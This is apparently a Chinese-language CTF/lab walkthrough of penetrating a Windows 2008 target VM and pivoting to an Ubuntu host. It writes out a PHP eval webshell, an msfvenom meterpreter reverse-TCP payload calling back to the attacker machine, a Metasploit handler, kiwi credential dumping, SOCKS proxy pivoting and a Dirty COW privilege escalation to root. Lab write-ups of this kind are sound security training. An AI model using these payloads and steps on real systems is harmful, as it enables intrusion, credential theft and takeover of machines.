一、靶机的环境搭配
攻击机(KALI):192.168.226.129
靶机(2008): 192.168.114.130
使用工具:burp、一句话木马、中国蚁剑、大马制作、路由转发、脏牛提权
1、配置靶场IP
点击win2008-编辑-虚拟机网络编辑器-
更改VMnet8,修改子网ip地址为192.168.114.0,应用保存
最后本机打开网络共享中心à更改适配器àVMnet8网卡à属性àIPv4协议 修改ip地址为192.168.114.1和默认网关192.168.114.2。
二、战前准备
1、扫描目标网段
命令:arp-scan -l
扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址
并且显示返回的所有响应。
arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。防火墙设备可以屏蔽ping,但是并不能屏蔽ARP数据包。
扫描到目标靶机192.168.114.130
二、目标信息收集
对方使用了操作系统是Windows server猜测可能开放了http服务,并且有个域,IP地址为192.168.114.5,发现不能直接访问这个网站,需要拿到130的webshell并设立跳板
三、网站页面收集
使用 dirb http://192.168.114.130寻找登录界面
三、渗透开始
1、设置代理,抓包修改账户
完成抓包后发送到repeater模块,修改用户名为admin,发送出去
2、webshell的获取
登录admin账户
生成制作一句话木马<?php @eval($_POST['pass']);?>,写入PHP文件,最后压缩成zip文件
开始上传一句话木马,并用中国蚁剑连接
http://192.168.114.130/templates/a.php
制作大马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.129 LPORT=44444 -f exe -o test.exe 注意129为kali 的IP
3、启动MSF
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.114.129 本机IP
lhost => 192.168.114.129
msf6 exploit(multi/handler) > set lport 44444
lport => 44444
msf6 exploit(multi/handler) > exploit
4、更换进程为系统进程,并获取登录密码
ps
load kiwi
creds_all
3、配置路由
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set version 5
version => 5msf6 auxiliary(server/socks_proxy) > set srvhost 192.168.114.129
srvhost => 192.168.114.129
msf6 auxiliary(server/socks_proxy) > run
对另一台主机的信息收集
proxychains nmap 192.168.114.1/24 -F
设置端口转发 portfwd add -l 2222 -p 22 -r 192.168.114.5
cd CVE-2016-5195
scp * cqxxx@192.168.114.5:~ 复制文件并上传
登录执行漏洞
yes
123456Aa!qaz
cqxxx@ubuntu:~$ ls
changelog CONTRIBUTING.md dcow.cpp makefile README.md version
cqxxx@ubuntu:~$ make
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
cqxxx@ubuntu:~$ ./dcow -s
Running ...
Password overridden to: dirtyCowFunReceived su prompt (Password: )
root@ubuntu:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@ubuntu:~# \cp /tmp/.ssh_bak /etc/passwd
root@ubuntu:~# \rm /tmp/.ssh_bak
root@ubuntu:~# ls
flag.txt
root@ubuntu:~# cat flag.txt
147258369